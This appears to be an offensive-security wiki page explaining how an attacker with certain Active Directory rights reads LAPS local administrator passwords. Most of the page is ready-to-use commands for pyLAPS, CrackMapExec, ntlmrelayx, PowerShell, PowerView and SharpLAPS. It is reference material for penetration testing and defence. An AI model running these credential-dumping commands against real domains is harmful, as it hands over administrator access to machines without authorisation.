ReadLAPSPassword

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
UNIX-like
Windows
From UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
Alternatively, CrackMapExec also has this ability (since v5.1.6).. In case it doesn't work this public module for CrackMapExec could also be used.
# Default command
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
​
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.
​LAPSDumper is another Python alternative.
This can be achieved with the Active Directory PowerShell module.
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
The PowerView powershell module from PowerSploit can also be used for that purpose.
Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
​SharpLAPS (C#) automates that process. 
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"
References
DirSync: Leveraging Replication Get-Changes and Get-Changes-In-Filtered-Set
simondotsh’s infosec stuff
Targeted Kerberoasting
ReadGMSAPassword
Last modified 4mo ago